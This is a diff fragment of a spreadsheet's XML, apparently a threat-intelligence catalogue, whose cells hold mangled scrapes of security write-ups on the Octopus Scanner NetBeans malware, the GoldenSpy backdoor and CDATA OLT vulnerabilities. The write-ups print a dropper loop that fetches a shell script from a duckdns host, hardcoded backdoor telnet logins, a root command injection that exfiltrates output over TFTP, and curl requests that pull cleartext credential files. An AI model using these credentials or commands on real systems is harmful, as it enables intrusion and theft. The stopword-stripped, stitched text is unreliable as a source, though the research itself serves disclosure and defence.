'project', 'file', 'file', 'high', 'evel', 'description', 'octopus', 'scanner', 'operation', 'user', 'directory', 'enumerate', 'project', 'netbean', 'copy', 'malicious', 'payload', 'nbprojectcachedat', 'nbprojectbuildimplxml', 'file', 'sure', 'malicious', 'payload', 'time', 'project', 'malicious', 'payload', 'instance', 'octopus', 'scanner', 'file', 'server', 'active', 'time', 'analysis', 'repository', 'risk', 'user', 'build', 'project', 'platform', 'abuse', 'case', 'repository', 'owner', 'unaware', 'malicious', 'activity', 'banning', 'maintainer', 'option', 'investigation', 'malware', 'figure', 'infected', 'repository', 'user', 'account', 'infection', 'detail', 'user', 'octopus', 'scanner', 'search', 'indication', 'developer', 'system', 'case', 'action', 'malware', 'backdoor', 'netbean', 'project', 'mechanism', 'sure', 'time', 'project', 'file', 'dropper', 'dropper', 'mechanism', 'filesystem', 'dropper', 'payload', 'local', 'system', 'persistence', 'remote', 'administration', 'tool', 'server', 'project', 'malicious', 'build', 'artifact', 'place', 'contact', 'owner', 'repository', 'pull', 'request', 'delete', 'clean', 'nbprojectbuildimplxml', 'file', 'expectation', 'enough', 'clean', 'repository', 'local', 'infection', 'developer', 'active', 'platform', 'developer', 'local', 'platform', 'deep', 'analysis', 'malware', 'wrong', 'simple', 'step', 'sufficient', 'file', 'available', 'project', 'dependency', 'artifact', 'sample', 'octopus', 'scanner', 'infecter', 'reviewing', 'repository', 'different', 'version', 'downstream', 'system', 'example', 'project', 'repository', 'artifact', 'build', 'variant', 'local', 'system', 'infection', 'build', 'artifact', 'untouched', 'technical', 'analysis', 'analysis', 'sample', 'octopus', 'scanner', 'malware', 'account', 'initial', 'infection', 'vector', 'dashboard', 'detection', 'rate', 'unnoticed', 'httpswwwvirustotalcomguifilebe8d29f95a9626e2476a74f895743f54451014aab62840770e4f9704980b0ac6detail', 'detection', 'rate', 'first', 'submission', 'late', 'content', 'modification', 'diagram', 'different', 'part', 'disguise', 'file', 'file', 'nbprojectmalwaresample', 'master', 'file', 'ocstxt', 'archive', 'datum', 'nbprojectmalwaresample', 'master', 'decimal', 'hexadecimal', 'description', 'archive', 'datum', 'compressed', 'size', 'uncompressed', 'size', 'name', 'metainfmanifestmf', 'archive', 'datum', 'compressed', 'size', 'uncompressed', 'size', 'name', 'octopussetupoctopussetupclass', 'archive', 'datum', 'compressed', 'size', 'uncompressed', 'size', 'name', 'resourcesoctopusdat', '0x3de17', 'archive', 'footer', 'length', 'manifest', 'first', 'stage', 'dropper', 'octopussetupoctopussetupmain', 'method', 'entry', 'method', 'second', 'stage', 'payload', 'victim', 'system', 'unixlike', 'system', 'first', 'stage', 'dropper', 'perform', 'step', 'second', 'stage', 'payload', 'octopusdat', 'homeconfigautostartoctodesktop', 'content', 'usrbinenv', 'desktop', 'entry', 'typeapplication', 'nameautoupdate', 'execbinsh', 'second', 'stage', 'payload', 'desktop', 'session', 'user', 'file', 'system', 'separator', 'decide', 'note', 'system', 'second', 'stage', 'payload', 'octopusdat', 'run', 'schtask', 'logsprovider', 'javaw', 'minute', 'schedule', 'task', 'task', 'interesting', 'part', 'malware', 'second', 'stage', 'payload', 'octopusdat', 'file', 'netbean', 'infection', 'virustotal', 'detection', 'rate', 'first', 'submission', 'late', 'content', 'modification', 'sample', 'analyzing', 'version', 'scheme', 'indication', 'structured', 'close', 'octopusoctopusscannermain', 'method', 'action', 'configpreferencesorgnetbeansmodulesprojectuipropertie', 'file', 'file', 'information', 'netbean', 'project', 'available', 'system', 'search', 'openprojectsurlsxxx', 'entry', 'entry', 'project', 'project', 'project', 'file', 'cachedat', 'projectnbprojectbuildimplxml', 'cachedat', 'part', 'build', 'process', 'project', 'build', 'multiple', 'step', 'octopus', 'scanner', 'malware', 'interested', 'prejar', 'postjar', 'task', 'prejar', 'task', 'hook', 'point', 'class', 'zipped', 'final', 'artifact', 'postjar', 'task', 'hook', 'build', 'point', 'order', 'access', 'build', 'hook', 'search', 'entry', 'target', 'name', 'empty', 'placeholder', 'easy', 'customization', 'override', 'target', 'buildxml', 'file', 'target', 'target', 'name', 'postjar', 'empty', 'placeholder', 'easy', 'customization', 'override', 'target', 'buildxml', 'file', 'target', 'prejar', 'hook', 'cachedat', 'infecter', 'class', 'file', 'target', 'name', 'empty', 'placeholder', 'easy', 'customization', 'override', 'target', 'buildxml', 'file', 'failonerror', 'false', 'value', 'prejar', 'value', 'hook', 'different', 'argument', 'name', 'postjar', 'empty', 'placeholder', 'easy', 'customization', 'override', 'target', 'buildxml', 'file', 'failonerror', 'false', 'value', 'postjar', 'value', 'responsible', 'class', 'class', 'infect', 'system', 'detail', 'analysis', 'octopus', 'scanner', 'stop', 'project', 'directory', 'file', 'similar', 'cachedat', 'infect', 'class', 'last', 'step', 'difficult', 'clean', 'repository', 'file', 'dependency', 'project', 'system', 'point', 'infection', 'chain', 'malware', 'artifact', 'project', 'dependency', 'drop', 'file', 'system', 'actual', 'system', 'infection', 'process', 'cachedat', 'biologic', 'virus', 'malware', 'attempt', 'possible', 'system', 'build', 'artifact', 'infect', 'host', 'project', 'system', 'artifact', 'system', 'life', 'way', 'virulent', 'digital', 'life', 'name', 'first', 'stage', 'dropper', 'cachedat', 'static', 'location', 'projectnbproject', 'able', 'query', 'repository', 'project', 'variant', 'malware', 'able', 'different', 'sample', 'staff', 'pwntester', 'staff', 'pwntester', 'staff', 'first', 'sample', 'different', 'size', 'safe', 'assume', 'sample', 'stand', 'crowd', 'sample', 'minor', 'difference', 'analysis', 'sample', '18107f2a3e8c7c03cc4d7ada8ed29401', 'detection', 'rate', 'first', 'submission', 'early', 'content', 'modification', 'early', 'first', 'version', 'malware', 'version', 'infect', 'class', 'file', 'system', 'version', 'repository', 'cloning', 'building', 'sample', 'build', 'artifact', 'particular', 'version', 'malware', 'build', 'class', 'diagram', 'different', 'unixlike', 'system', 'drop', 'file', 'homelibrarylaunchagentsautoupdaterdat', 'file', 'fenmainmain', 'method', 'turn', 'download', 'ratlike', 'tool', 'instance', 'portable', 'blog', 'homelibrarylaunchagentsautoupdaterplist', 'autolauncher', 'autoupdaterdat', 'dropper', 'java', 'homelibrarylaunchagentsautoupdaterdat', 'binsh', 'homeconfigautostartdesktop', 'file', 'binsh', 'truedo', 'wget', 'httpelnduckdnsorgse', 'shsleep', 'script', 'homelibrarylaunchagentssoftwaresyncplist', 'similar', 'step', 'run', 'httpelnduckdnsorgse', 'explicit', 'support', 'specific', 'launch', 'path', 'mechanism', 'popular', 'many', 'distribution', 'system', 'drop', 'dropper', 'reflection', 'dropper', 'schtask', 'detection', 'rate', 'first', 'submission', 'early', 'content', 'modification', 'version', 'malware', 'stage', 'task', 'responsible', 'class', 'infection', 'dropper', 'class', 'infect', 'system', 'dropping', 'file', 'sample', 'task', 'empty', 'file', 'netbeansautomaticbuild', 'netbeansupdateresource', 'marker', 'content', 'uptodate', 'state', 'bypass', 'mechanism', 'project', 'detection', 'rate', 'first', 'submission', 'early', 'content', 'modification', 'version', 'early', 'version', 'main', 'difference', 'name', 'file', 'homelibrarylaunchagentsmainclass', 'homelocalsharemainclass', 'detection', 'rate', 'first', 'submission', 'early', 'content', 'modification', 'version', 'identical', 'likely', 'minor', 'release', 'detection', 'minor', 'change', 'artifact', 'malware', 'author', 'detection', 'many', 'engine', 'solution', 'malware', 'string', 'cachedat', 'class', 'interesting', 'analysis', 'malware', 'sample', 'code', 'hard', 'sample', 'different', 'datum', 'blob', 'byte', 'datum', 'blob', 'method', 'public', 'static', 'void', 'exception', 'class', 'var0', 'class', 'forname', 'thread', 'currentthread', 'getclassname', 'system', 'arraycopy', 'byte', 'byte', 'getfield', 'object', 'object', 'null', 'blob', 'reconstruction', 'decrypt', 'blob', 'routine', 'public', 'static', 'void', 'exception', 'class', 'var0', 'class', 'forname', 'thread', 'currentthread', 'byte', 'var3', 'byte', 'class', 'forname', 'thread', 'currentthread', 'getfield', 'object', 'var2', 'byte', 'byte', 'byte', 'byte', 'byte', 'able', 'access', 'datum', 'good', 'idea', 'malware', 'datum', 'agent', 'bytecode', 'class', 'responsible', 'decrypting', 'blob', 'right', 'writing', 'classfiletransformer', 'bytecode', 'manipulation', 'analysis', 'code', 'classpool', 'classpool', 'getdefault', 'class', 'ctclass', 'decryption', 'method', 'code', 'dump', 'thisa', 'string', 'tmpmemorydump', 'file', 'clear', 'understanding', 'malware', 'useful', 'transformation', 'analysis', 'javaiofileoutputstream', 'constructor', 'capture', 'name', 'file', 'dropper', 'question', 'finaltargetclassname', 'javaiofileoutputstream', 'system', 'println', 'classpool', 'classpool', 'getdefault', 'targetclassname', 'ctor', 'system', 'println', 'agent', 'class', 'catch', 'exception', 'system', 'println', 'getmessage', 'printstacktrace', 'good', 'understanding', 'file', 'malware', 'access', 'pwntesterpwnlabworkspaceoctopusanalysisjavaagent', 'test', 'transformer', 'javaiofileoutputstream', 'agent', 'class', 'javaiofileoutputstream', 'javaiofileoutputstream', 'agent', 'class', 'javaiofileoutputstream', 'homepwntesterconfigautostartdesktop', 'homepwntesterlibrarylaunchagentsautoupdaterplist', 'homepwntesterlibrarylaunchagentsmainclass', 'conclusion', 'many', 'case', 'software', 'supply', 'chain', 'hijacking', 'developer', 'credential', 'popular', 'package', 'name', 'malware', 'abuse', 'process', 'artifact', 'interesting', 'multiple', 'reason', 'context', 'malware', 'effective', 'transmission', 'affected', 'project', 'many', 'different', 'system', 'actual', 'artifact', 'build', 'disconnected', 'original', 'build', 'process', 'track', 'fact', 'user', 'developer', 'high', 'interest', 'attacker', 'developer', 'additional', 'project', 'production', 'environment', 'database', 'password', 'critical', 'asset', 'huge', 'potential', 'escalation', 'access', 'core', 'attacker', 'objective', 'case', 'interesting', 'malware', 'process', 'common', 'today', 'malware', 'developer', 'time', 'implement', 'mean', 'attack', 'malware', 'build', 'system', 'gradle', 'other', 'unnoticed', 'build', 'process', 'wild', 'trend', 'way', 'integrity', 'supply', 'chain', 'feature', 'issue', 'dependency', 'dependency', 'graph', 'alert', 'vulnerable', 'dependency', 'update', 'feature', 'potential', 'issue', 'code', 'code', 'secret', 'scanning', 'course', 'active', 'response', 'channel', 'research', 'capability', 'initiative', 'source', 'coalition', 'thank', 'dfirit', 'research', 'blog', 'post', 'product', 'enterprise', 'customer', 'story', 'pricing', 'resource', 'platform', 'developer', 'partner', 'electron', 'desktop', 'support', 'doc', 'community', 'professional', 'service', 'status', 'contact', 'blog', 'career', 'press', 'shop', 'term', 'privacy', 'cookie', 'setting']</t>
         </is>
       </c>
     </row>
@@ -4120,15 +3565,14 @@
           <t>Chrome Web Store</t>
         </is>
       </c>
-      <c r="C142" t="inlineStr"/>
+      <c r="C142" t="inlineStr">
+        <is>
+          <t>Awake have harvested 111 malicious or fake Chrome extensions using GalComm domains for attacker command and control infrastructure and/or as loader pages for the extensions. These extensions can take screenshots, read the clipboard, harvest credential tokens stored in cookies or parameters, grab user keystrokes (like passwords), etc.</t>
+        </is>
+      </c>
       <c r="D142" t="inlineStr">
         <is>
           <t>https://awakesecurity.com/blog/the-internets-new-arms-dealers-malicious-domain-registrars/</t>
-        </is>
-      </c>
-      <c r="E142" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -4145,17 +3589,12 @@
       </c>
       <c r="C143" t="inlineStr">
         <is>
-          <t>trustwave spiderlabs uncovers unique cybersecurity risks todays tech landscape learn contact login fusion platform login trustwave fusion platform mailmarshal cloud login incident response experiencing breach access immediate incident response assistance hour hotlines americas emea australia singapore recommended actions request demo services solutions trustwave partners resources contact login login fusion platform login trustwave fusion platform mailmarshal cloud login incident response incident response experiencing breach access immediate incident response assistance hour hotlines americas emea australia singapore recommended actions trustwave spiderlabs uncovers unique cybersecurity risks todays tech landscape learn request demo services managed detection response eliminate active threats detection investigation response comanaged siem maximize siem investment stop alert fatigue enhance team hybrid operations support advisory diagnostics advance cybersecurity program expert guidance need penetration testing test physical locations infrastructure shore weaknesses exploitation database prevent unauthorized access exceed compliance requirements email stop email threats others miss secure organization ransomware attack vector digital forensics incident response prepare inevitable global breach response inregion available onsite firewall technology management mitigate risk cyberattack incident health monitoring latest intelligence view trustwave services solutions industry education financial services government healthcare hotels legal manufacturing retail regulation data privacy cmmc fisma gdpr glba hipaa topic microsoft exchange server attacks stay protected emerging threats rapidly secure environments rapid response situations securing cloud safely navigate stay protected securing landscape test monitor secure network objects trustwave reduce cyber risk fortify organizations awards accolades recognition analysts media outlets trustwave spiderlabs team global researchers ethical hackers responders trustwave fusion operations platform unprecedented visibility control trustwave colony access cybersecurity protection resources partners technology alliance partners alliances align support ecosystem offerings trustwave partnerone program join forces trustwave protect advance cybersecurity threats register login resources blogs trustwave blog spiderlabs blog upcoming webinars events media assets document library video library analyst reports webinar replays case studies trials evaluations notices advisories software updates help contact support spiderlabs blog golden department emergence goldenspy malware june minutes read brian hussey trustwave spiderlabs discovered malware family dubbed goldenspy embedded payment software chinese bank requires corporations install conduct business operations china april trustwave spiderlabs fusion team engaged customer conduct hunt company global technology vendor significant government business australia recently opened offices china hunt produced several findings important longterm network however finding stood potentially impacting countless businesses currently operate china full analysis findings available download report research report golden department emergence goldenspy malware trustwave spiderlabs hunting experts investigate malware campaign targeting corporations operating china report identifies provides specific hunting investigative remediation methodologies used help ensure environment clean download investigation details identified executable file displaying highly unusual behavior sending system information suspicious chinese domain discussions client revealed part bank’s required software informed upon opening operations china local chinese bank required install software package called intelligent produced golden department aisino corporation paying local taxes continued investigation software found worked advertised also installed hidden backdoor system enabled remote adversary execute windows commands upload execute binary include ransomware trojans malware basically wideopen door network system level privileges connected command control server completely separate software’s network infrastructure based several factors described determined file sufficient characteristics malware we’ve since fully reverseengineered files named family goldenspy goldenspy digitally signed company called chenkuo network technology signature used identical text product description fields 认证软件版本升级服务 translates “certified software version upgrade service” name sound like legitimate software however situation software already updater service functions well completely unrelated goldenspy several unusual aspects file include goldenspy installs identical versions persistent autostart services either stops running respawn counterpart furthermore utilizes exeprotector module monitors deletion either iteration deleted download execute version effectively triplelayer protection makes exceedingly difficult remove file infected system intelligent software’s uninstall feature uninstall goldenspy leaves goldenspy running open backdoor environment even software fully removed goldenspy downloaded installed full hours software installation process completed finally downloads installs silently notification system long delay highly unusual method hide victim’s notice goldenspy contact software’s network infrastructure ixinnuocom rather reaches ningzhidatacom domain known host variations goldenspy malware first three attempts contact command control server randomizes beacon times known method avoid network technologies designed identify beaconing malware goldenspy operates system level privileges making highly dangerous capable executing software system includes additional malware windows administrative tools conduct reconnaissance create users escalate privileges factors conclusion goldenspy wellhidden powerful backdoor surrenders full remote command control victim system unknown adversary diagram shows network communication patterns goldenspy installation intelligent software scope campaign currently known client goldenspy secretly embedded within aisino intelligent software cannot determine targeted access vital data campaign impacts every company business china identified similar activity global financial institution telemetry campaign current goldenspy campaign began april however cyber intel analysts discovered variations goldenspy date back december interest chenkuo technology’s website announced partnership aisino october months prior original emergence goldenspy malware family partnership “big data cooperation” goldenspy certainly could enable data access collection trustwave spiderlabs current knowledge goldenspy active wild since first identification usage april clear know scope purpose actors behind know whether chenkuo technology aisino active andor willing participants extent involvement presented report recommendations believe every corporation operating china using aisino intelligent software consider incident potential engage hunting containment remediation countermeasures outlined technical report download link trustwave spiderlabs still actively investigating seeking telemetry goldenspy campaign information activity feel victimized attack please reach trustwave spiderlabs fusion team goldenspytrustwavecom available advice information exchange engage hunting forensic investigation services goldenspy technical report trustwave prepared detailed technical report goldenspy contains full incident details including network file system indicators compromise ioc’s malware reverse engineering analysis reports historical network ioc’s known goldenspy variants goldenspy hunting recommendations including custom yara signature designed identify unknown goldenspy variants remediation recommendations download aisino corporation nanjing chenkuo network technology contacted briefed findings part trustwaves documented vulnerability disclosure process time publication report neither responded brian hussey vice president cyber detection response trustwave leads spiderlabs fusion global operations teams trustwave’s managed detection response managed detection hunting intel investigation services fall purview latest spiderlabs blogs zero trust essentials part ongoing project cover cybersecurity topics weekly blog posts full series found read probably stop visually verifying checksums hello thanks stopping straight start things checksum inclusive audiences wikipedia read agent teslas ride rise novel loader malware loaders critical deploying malware enable actors deliver execute malicious payloads facilitating criminal activities like data theft ransomware utilizing advanced read stay informed sign receive latest news trends straight inbox trustwave leadership team history news releases media coverage careers global locations awards accolades trials evaluations contact support advisories software updates legal terms privacy policy copyright trustwave holdings rights reserved</t>
+          <t>the GoldenSpy malware is installed as part of the mandated Chinese Golden Tax VAT software produced by Aisino.</t>
         </is>
       </c>
       <c r="D143" t="inlineStr">
         <is>
           <t>https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/</t>
-        </is>
-      </c>
-      <c r="E143" t="inlineStr">
-        <is>
-          <t>['trustwave', 'spiderlab', 'unique', 'cybersecurity', 'risk', 'tech', 'landscape', 'contact', 'login', 'fusion', 'platform', 'login', 'trustwave', 'fusion', 'platform', 'cloud', 'incident', 'response', 'breach', 'access', 'immediate', 'incident', 'response', 'assistance', 'hour', 'action', 'demo', 'service', 'solution', 'partner', 'resource', 'contact', 'login', 'login', 'fusion', 'platform', 'login', 'trustwave', 'fusion', 'platform', 'cloud', 'incident', 'response', 'breach', 'access', 'immediate', 'incident', 'response', 'assistance', 'hour', 'action', 'spiderlab', 'unique', 'cybersecurity', 'risk', 'tech', 'landscape', 'request', 'demo', 'service', 'detection', 'response', 'active', 'threat', 'detection', 'investigation', 'response', 'alert', 'fatigue', 'enhance', 'team', 'hybrid', 'operation', 'advisory', 'diagnostic', 'cybersecurity', 'program', 'expert', 'guidance', 'penetration', 'testing', 'test', 'physical', 'location', 'infrastructure', 'shore', 'weakness', 'exploitation', 'database', 'unauthorized', 'access', 'compliance', 'requirement', 'email', 'email', 'threat', 'other', 'secure', 'organization', 'ransomware', 'attack', 'vector', 'digital', 'forensic', 'incident', 'response', 'inevitable', 'global', 'breach', 'response', 'inregion', 'available', 'onsite', 'firewall', 'technology', 'management', 'risk', 'cyberattack', 'incident', 'health', 'monitoring', 'late', 'intelligence', 'view', 'trustwave', 'service', 'solution', 'industry', 'education', 'financial', 'service', 'government', 'healthcare', 'hotel', 'legal', 'retail', 'regulation', 'datum', 'glba', 'hipaa', 'topic', 'server', 'attack', 'threat', 'environment', 'rapid', 'response', 'situation', 'cloud', 'landscape', 'test', 'monitor', 'secure', 'network', 'object', 'trustwave', 'cyber', 'risk', 'fortify', 'organization', 'award', 'recognition', 'analyst', 'medium', 'outlet', 'spiderlab', 'team', 'global', 'researcher', 'ethical', 'hacker', 'trustwave', 'fusion', 'operation', 'platform', 'unprecedented', 'visibility', 'control', 'trustwave', 'colony', 'access', 'cybersecurity', 'protection', 'resource', 'partner', 'technology', 'alliance', 'partner', 'alliance', 'support', 'ecosystem', 'offering', 'partnerone', 'program', 'join', 'force', 'advance', 'cybersecurity', 'threat', 'login', 'resource', 'blog', 'trustwave', 'blog', 'spiderlab', 'blog', 'upcoming', 'webinar', 'event', 'medium', 'asset', 'document', 'library', 'video', 'analyst', 'webinar', 'replay', 'case', 'study', 'trial', 'evaluation', 'advisory', 'software', 'update', 'contact', 'support', 'spiderlab', 'blog', 'emergence', 'minute', 'spiderlab', 'goldenspy', 'payment', 'software', 'corporation', 'business', 'operation', 'trustwave', 'spiderlab', 'fusion', 'team', 'customer', 'conduct', 'hunt', 'company', 'global', 'technology', 'vendor', 'significant', 'government', 'office', 'several', 'finding', 'important', 'longterm', 'network', 'countless', 'business', 'full', 'analysis', 'finding', 'available', 'download', 'report', 'research', 'report', 'emergence', 'trustwave', 'spiderlab', 'expert', 'campaign', 'corporation', 'report', 'specific', 'investigative', 'remediation', 'methodology', 'environment', 'clean', 'download', 'investigation', 'detail', 'executable', 'file', 'unusual', 'behavior', 'system', 'information', 'suspicious', 'chinese', 'domain', 'discussion', 'client', 'bank', 'software', 'operation', 'install', 'software', 'package', 'intelligent', 'golden', 'department', 'aisino', 'corporation', 'local', 'taxis', 'investigation', 'software', 'backdoor', 'system', 'remote', 'adversary', 'window', 'command', 'execute', 'binary', 'ransomware', 'trojan', 'malware', 'door', 'network', 'system', 'level', 'privilege', 'command', 'server', 'separate', 'software', 'network', 'infrastructure', 'several', 'factor', 'determined', 'file', 'sufficient', 'characteristic', 'malware', 'file', 'family', 'company', 'network', 'technology', 'signature', 'identical', 'text', 'product', 'description', 'field', 'software', 'version', 'upgrade', 'service', 'name', 'sound', 'legitimate', 'software', 'situation', 'software', 'service', 'function', 'unrelated', 'goldenspy', 'several', 'unusual', 'aspect', 'file', 'identical', 'version', 'persistent', 'autostart', 'service', 'respawn', 'counterpart', 'exeprotector', 'module', 'deletion', 'iteration', 'download', 'version', 'protection', 'difficult', 'remove', 'file', 'system', 'intelligent', 'software', 'uninstall', 'feature', 'uninstall', 'goldenspy', 'goldenspy', 'open', 'backdoor', 'environment', 'software', 'full', 'hour', 'software', 'installation', 'process', 'install', 'notification', 'system', 'unusual', 'method', 'victim', 'software', 'network', 'infrastructure', 'domain', 'host', 'variation', 'contact', 'command', 'server', 'randomize', 'time', 'method', 'network', 'technology', 'system', 'level', 'privilege', 'dangerous', 'capable', 'executing', 'software', 'system', 'additional', 'administrative', 'tool', 'reconnaissance', 'user', 'privilege', 'factor', 'conclusion', 'powerful', 'backdoor', 'surrender', 'full', 'remote', 'command', 'control', 'victim', 'system', 'unknown', 'adversary', 'network', 'communication', 'pattern', 'installation', 'intelligent', 'software', 'scope', 'campaign', 'client', 'goldenspy', 'aisino', 'intelligent', 'software', 'targeted', 'access', 'vital', 'datum', 'campaign', 'company', 'similar', 'activity', 'global', 'financial', 'institution', 'telemetry', 'campaign', 'current', 'goldenspy', 'campaign', 'analyst', 'variation', 'interest', 'website', 'partnership', 'aisino', 'month', 'prior', 'original', 'emergence', 'big', 'datum', 'cooperation', 'goldenspy', 'datum', 'access', 'collection', 'trustwave', 'spiderlab', 'current', 'knowledge', 'active', 'wild', 'first', 'identification', 'usage', 'clear', 'know', 'scope', 'purpose', 'actor', 'technology', 'aisino', 'active', 'andor', 'willing', 'participant', 'extent', 'involvement', 'report', 'recommendation', 'corporation', 'aisino', 'intelligent', 'software', 'incident', 'potential', 'hunting', 'containment', 'remediation', 'countermeasure', 'technical', 'report', 'download', 'link', 'trustwave', 'spiderlab', 'telemetry', 'campaign', 'information', 'activity', 'attack', 'trustwave', 'spiderlab', 'fusion', 'team', 'advice', 'information', 'exchange', 'forensic', 'investigation', 'service', 'trustwave', 'detailed', 'technical', 'report', 'goldenspy', 'full', 'incident', 'detail', 'network', 'file', 'system', 'indicator', 'engineering', 'analysis', 'report', 'historical', 'network', 'goldenspy', 'variant', 'recommendation', 'custom', 'yara', 'signature', 'unknown', 'goldenspy', 'variant', 'remediation', 'recommendation', 'aisino', 'corporation', 'finding', 'part', 'vulnerability', 'disclosure', 'process', 'time', 'publication', 'report', 'detection', 'response', 'trustwave', 'spiderlab', 'fusion', 'global', 'operation', 'team', 'detection', 'response', 'detection', 'investigation', 'service', 'purview', 'late', 'spiderlab', 'blog', 'trust', 'essential', 'part', 'ongoing', 'project', 'cybersecurity', 'topic', 'weekly', 'blog', 'post', 'full', 'series', 'checksum', 'thank', 'straight', 'start', 'thing', 'inclusive', 'audience', 'wikipedia', 'agent', 'tesla', 'ride', 'rise', 'novel', 'loader', 'critical', 'malware', 'actor', 'malicious', 'payload', 'criminal', 'activity', 'data', 'theft', 'ransomware', 'advanced', 'read', 'informed', 'sign', 'late', 'news', 'trend', 'straight', 'inbox', 'trustwave', 'leadership', 'team', 'history', 'news', 'medium', 'coverage', 'career', 'global', 'location', 'award', 'trial', 'contact', 'support', 'advisory', 'software', 'legal', 'term', 'privacy', 'policy', 'copyright', 'trustwave', 'holding', 'right']</t>
         </is>
       </c>
     </row>
@@ -4172,17 +3611,12 @@
       </c>
       <c r="C144" t="inlineStr">
         <is>
-          <t>research pierre home feed multiple vulnerabilities found cdata olts product description cdata olts ftth olts sold different brands cdata optilink bliy allowing provide ftth connectivity large number clients using onts devices support multiple 10gigabit uplinks provide internet connectivity onts clients validated vulnerabilities fd1104b fd1108sn olts environment latest firmware versions v122 using static analysis vulnerabilities also appear affect available models codebase similar 72408a 9008a 9016a 92408a 92416a 97024p 97028p 97042p 97084p 97168p fd1002s fd1104 fd1104b fd1104s fd1104sn fd1108s fd1204sr2 fd1204sn fd1204snr2 fd1208sr2 fd1216sr1 fd1608gs fd1608sn fd1616gs fd1616sn fd8000 analyzed binaries extracted information vendor cdata flat bldg 4south honghualing industrial zone liuxian road xili town shenzhen guangdong china518055 marketingcdatateccom explanation ftth architecture check previous research httppierrekimgithubioblog20161101gponftthnetworksinsecurityhtml vulnerabilities summary summary vulnerabilities backdoor access telnet cve202029059 cve202029060 cve202029061 cve202029062 credentials infoleak credentials cleartext telnet cve202029054 escape shell root privileges cve202029056 preauth remote cve202029057 credentials infoleak credentials cleartext http cve202029058 weak encryption algorithm cve202029063 insecure management interfaces cve202029055 details backdoor access telnet telnet server running appliance reachable interface ftth interface onts depending firmware backdoor credentials change find complete list backdoor undocumented credentials giving attacker complete administrator access previous versions abused login suma123 password panger123 recent versions abused login debug password debug124 login root password root126 login guest password empty authentication process hardcoded credentials credentials extracted firmware images credentials depends vendors version firmware appearance different access still works using suma123 panger123 telnet command line interface epon system hardware software v122 created time copyright rights reserved usernamepanger123 passwordsuma123 entry supperuer successfully epon alarm setting system alarm bestsys configure information eponworkmode configure epon workingmode ethernetring configure rapid ring igmpsnooping configure igmp snooping interface interface type ipconfig configure system address logout exit system macaddresstable ctrlcard dynamic address table management mirror configure switch mirror onuauth configure authentication mode ping ping portisolategroup create portisolategroup must enable portisolatemode group rmon configure rmon rstp rapid spanning tree protocol configuration show show system configuration system configure systerm trunk enter trunk config mode undo delete relational configuration vlan enter vlan config mode epon using guest empty telnet command line interface epon system hardware software created time copyright rights reserved usernameguest passwordempty epon local configuration command global command broadcast write message users logged clear clear screen history show command history logout system ping ping network hosts show show system configuration tracert trace route host tree show command tree epon show local configuration command show acls auth show auth mode dhcpsnooping show dhcp snooping configurations exectimeout show console timeout igmp show igmp snooping configurations macaddress macaddress macaddresstable show current ports address mirror show switch mirror configurations show olts configuration onuposition show position qinq show qinq configuration rmon show rmon rstp display rstp information runningconfig show current runningconfiguration startupconfig show current startupconfiguration swmode show swmode swport display port attribute information system show system configuration trunk show trunk configuration vlan show vlan configuration server epon using root root126 telnet command line interface epon system hardware software created time copyright rights reserved usernameroot passwordroot126 epon local configuration command create acls acldel delete acls auth configure authentication mode cdtsys configure information dhcpsnooping configure dhcp snooping exectimeout timeout value igmp configure igmp snooping macaddress ctrlcard dynamic address table management mirror configure switch mirror multicastvlan multicastvlan mvlan configure reset reset values rmon configure rmon rstp rapid spanning tree protocol configuration swmode basic switch mode swport enter switch port config mode system configure systerm trunk enter trunk config mode vlan enter vlan config mode global command broadcast write message users logged clear clear screen debug debug history show command history logout system ping ping network hosts show show system configuration tracert trace route host tree show command tree display users currently logged epon using debug debug124 telnet command line interface epon system hardware software created time copyright rights reserved usernamedebug passworddebug124 epon local configuration command create acls acldel delete acls auth configure authentication mode dhcpsnooping configure dhcp snooping exectimeout timeout value igmp configure igmp snooping macaddress ctrlcard dynamic address table management mirror configure switch mirror multicastvlan multicastvlan mvlan configure reset reset values rmon configure rmon rstp rapid spanning tree protocol configuration swmode basic switch mode swport enter switch port config mode system configure systerm trunk enter trunk config mode vlan enter vlan config mode global command broadcast write message users logged clear clear screen debug debug history show command history logout system ping ping network hosts show show system configuration tracert trace route host tree show command tree display users currently logged epon access attacker completely overwrite configuration overwrite firmware details credentials infoleak credentials cleartext telnet part suppose attacker working access achieved using backdoor access telnet possible extract administrator credentials running command epon show system infor server version v120 buildtime administrator logincleartext password passwordcleartext details escape shell root privileges part suppose attacker working access achieved using backdoor access telnet command injection allowing attacker execute commands root command injection located tftp download configuration part case used metasploit start tftp server receive results injected commands tftp server msfconsole auxiliaryservertftp epon system configurations download proccpuinfo tmptest tftp tmptest test uncompress file failed tftp server running attacker machine receive output command proccpuinfo tmptest system type broadcom bcm956218 processor model broadcom bcm3302 bogomips wait instruction microsecond timers tlbentries extra interrupt vector hardware watchpoint ases implemented mips16 vced exceptions available vcei exceptions available also possible exfiltrate information using embedded webserver epon system configurations download export optlighttpdwebcgiouttxt attacker machine curl httpipcgiouttxt export homebroadcom export oldpwd export pathsbinusrsbinbinusrbin export pwdbroadcom export shellbinsh export termvt102 export userroot futhermore everything running root appliance user command init ksoftirqd0 events0 khelper kthread kblockd0 sysled pdflush pdflush kswapd0 aio0 mtdblockd binsh etcrcs jffs2gcdmtd5 bkncmd bknevt fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat fd1008sdat tftp tmptest tftp tmptest test tmpcfgdownloadtargz tftp tmptest tftp tmptest test tmpcfgdownloadtargz details preauth remote telnet server running appliance reachable interface ftth interface onts using cuttingedge fuzzing technology based machinelearning shawarma able reboot vendor using command devurandom hexdump cdone device reboot next seconds leds blink like christmas tree details credentials infoleak credentials cleartext http server running appliance reachable interface ftth interface onts without authentication attacker extract telnet credentials snmp communities read write fetching files optlighttpdwebcgisnmpreadtxt optlighttpdwebcgisnmpwritetxt optlighttpdwebcgiweblogintxt optlighttpdwebcgiwebpasswdtxt optlighttpdwebcgionunametxt optlighttpdwebcgioemtxt using curl curl httpipcgisnmpreadtxt curl httpipcgisnmpwritetxt curl httpipcgioemtxt curl 